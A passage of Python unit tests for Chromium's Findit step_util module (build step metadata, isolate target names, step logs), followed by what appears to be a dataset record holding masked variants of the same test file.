'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@mock.patch.object(
step_util, 'LegacyGetStepMetadata', return_value={'a': 'b'})
def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):
self.assertEqual(
None,
step_util.LegacyGetIsolateTargetName(
'm', 'b', 200, 'viz_browser_tests (with patch) on Android'))
@parameterized.expand([({
'isolate_target_name': 'isolate_target'
}, 'isolate_target'), (None, None), ({
'a': 'b'
}, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetIsolateTargetName(self, step_metadata, expected_isolate_target,
mocked_get_stepmeta):
mocked_get_stepmeta.return_value = step_metadata
self.assertEqual(expected_isolate_target,
step_util.GetIsolateTargetName(123, 'full step name'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):
step_util.GetIsolateTargetName(123, 'full step name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetIsolateTargetName(123, 'full step name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),
(None, None)])
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetOS(self, mock_fn_return, expected_platform, mock_fn):
mock_fn.return_value = mock_fn_return
self.assertEqual(expected_platform,
step_util.GetOS(123, 'builder_name', 'step_name'))
@mock.patch.object(step_util, 'GetStepMetadata')
def testGetOSPartialMatch(self, mock_get_step_metadata):
step_util.GetOS(123, 'builder_name', 'step_name')
self.assertIn(False, mock_get_step_metadata.call_args[0])
step_util.GetOS(123, 'builder_name', 'step_name', True)
self.assertIn(True, mock_get_step_metadata.call_args[0])
@mock.patch.object(
step_util,
'GetStepMetadata',
return_value=wf_testcase.SAMPLE_STEP_METADATA)
def testGetOSCached(self, mock_fn):
self.assertEqual('platform',
step_util.GetOS(123, 'builder_name', 'step_name'))
self.assertEqual(1, mock_fn.call_count)
self.assertEqual('platform',
step_util.GetOS(123, 'builder_name', 'step_name'))
self.assertEqual(1, mock_fn.call_count)
def testGetStepStartAndEndTime(self):
build_id = '8945610992972640896'
start_time = datetime.datetime(2019, 3, 6)
end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)
step = Step()
step.name = 's'
step.start_time.FromDatetime(start_time)
step.end_time.FromDatetime(end_time)
build = Build()
build.id = int(build_id)
build.steps.extend([step])
self.assertEqual((start_time, end_time),
step_util.GetStepStartAndEndTime(build, 's'))
self.assertEqual((None, None), step_util.GetStepStartAndEndTime(
build, 's2'))
|
normal
|
{
"blob_id": "325efe65030ad3488a7fc45c0d4a289eb0b17196",
"index": 1311,
"step-1": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n <mask token>\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n <mask token>\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n <mask token>\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n <mask token>\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-2": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n <mask token>\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n <mask token>\n <mask token>\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n <mask token>\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n <mask token>\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n <mask token>\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n <mask token>\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n <mask token>\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n <mask token>\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n <mask token>\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n <mask token>\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = 